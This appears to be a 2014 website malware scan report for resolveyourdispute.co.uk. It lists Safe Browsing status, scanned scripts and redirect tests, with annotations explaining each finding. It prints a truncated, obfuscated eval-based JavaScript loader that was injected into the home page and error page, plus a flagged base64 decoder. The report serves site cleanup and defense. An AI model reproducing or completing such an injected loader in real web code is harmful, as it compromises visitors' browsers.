Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=resolveyourdispute.co.uk
Result: The website is marked by Google as suspicious – visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious – visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://resolveyourdispute.co.uk/ | 200 OK Content-Length: 15710 Content-Type: text/html | malicious |
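Malicious code - confirmed by antiviruses (see below):
try{window.document.body++}catch(gdsgsdg){dbshre=254;if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32, z=s;e(s);}}
Note: the excerpt is truncated. The array literal breaks off after `32,` and the code that assigns `s` is not shown. What remains visible is the shape of an injected, obfuscated loader: `eval` is aliased to `e`, `String` to `ss`, a long numeric array is defined, and the script ends with `e(s)`, which evaluates a string built at run time (presumably decoded from the array).
Antivirus reports: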
| ||
http://smather.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://smather.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://smather.com/wp-content/themes/veecard/js/vendor/modernizr-2.6.1-respond-1.1.0.min.js?ver=2.6.1 | 200 OK Content-Length: 19447 Content-Type: application/javascript | clean |
http://smather.com/wp-content/themes/veecard/lib/prettyphoto/jquery.prettyPhoto.js?ver=3.1.4 | 200 OK Content-Length: 25298 Content-Type: application/javascript | clean |
http://smather.com/wp-content/themes/veecard/js/custom.js?ver=1.0 | 200 OK Content-Length: 2604 Content-Type: application/javascript | clean |
http://smather.com/wp-content/plugins/mini-twitter-feed/jquery.minitwitter.js?ver=3.8.5 | 200 OK Content-Length: 7822 Content-Type: application/javascript | clean |
https://platform.twitter.com/widgets.js | 200 OK Content-Length: 110239 Content-Type: application/javascript | clean |
https://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 160578 Content-Type: application/x-javascript | clean |
https://apis.google.com/js/plusone.js | 200 OK Content-Length: 12798 Content-Type: application/javascript | clean |
http://static.ak.fbcdn.net/connect.php/js/FB.Share | 200 OK Content-Length: 162677 Content-Type: application/x-javascript | clean |
https://platform.linkedin.com/in.js | 200 OK Content-Length: 3768 Content-Type: text/javascript | clean |
http://smather.com/wp-content/plugins/simple-mail-address-encoder/smae.js?ver=1.0 | 200 OK Content-Length: 1023 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
var keyStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
function smae_decode(m){ document.location.href='mailto:' + decode64(m); } function decode64(input) { var output = ''; var chr1, chr2, chr3 = ''; var enc1, enc2, enc3, enc4 = ''; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ''); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.indexOf(input.ch chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } chr1 = chr2 = chr3 = ''; enc1 = enc2 = enc3 = enc4 = ''; } while (i < input.length); return unescape(output); }
Note: the excerpt is cut in the middle of `decode64` (at `input.ch`). What is visible is only a base64 decoder that builds a `mailto:` link, and nothing in it is obviously harmful. Either the detection is triggered by content the excerpt omits or it is a heuristic match, so compare the file with a known-good copy of the plugin before treating it as infected or as clean.
Antivirus reports:
| ||
http://resolveyourdispute.co.uk/test404page.js | 200 OK Content-Length: 14595 Content-Type: text/html | malicious |
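Malicious code - confirmed by antiviruses (see below):
try{window.document.body++}catch(gdsgsdg){dbshre=254;if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32, z=s;e(s);}}
Note: this URL ends in `.js`, but the server answered `200 OK` with `Content-Type: text/html`, and the flagged snippet matches the one reported for the home page. If `test404page.js` is the scanner's probe for a non-existent path (the name suggests so), the injected script is also served on the site's error page. That would point to an injection in a shared template or at the server level rather than in a single file, which needs to be confirmed on the host. The excerpt is truncated.
Antivirus reports: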
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: resolveyourdispute.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:11:30 GMT
Server: Apache
Content-Length: 15710
Content-Type: text/html
Set-Cookie: PHPSESSID=1c46d938eefa4b3f2ea368540a9f1374; path=/
Set-Cookie: __utmfr=44; expires=Fri, 02-Jan-2015 18:11:30 GMT; path=/
X-Powered-By: PHP/5.4.35
...15710 bytes of data.
GET / HTTP/1.1
Host: resolveyourdispute.co.uk
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 18:11:30 GMT
Server: Apache
Content-Length: 15710
Content-Type: text/html
Set-Cookie: PHPSESSID=1c46d938eefa4b3f2ea368540a9f1374; path=/
Set-Cookie: __utmfr=44; expires=Fri, 02-Jan-2015 18:11:30 GMT; path=/
X-Powered-By: PHP/5.4.35
...15710 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: resolveyourdispute.co.uk
Referer: http://www.google.com/search?q=resolveyourdispute.co.uk
Result:
The result is similar to the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: resolveyourdispute.co.uk
Referer: http://www.google.com/search?q=resolveyourdispute.co.uk
Result:
The result is similar to the first query. No suspicious redirects were found.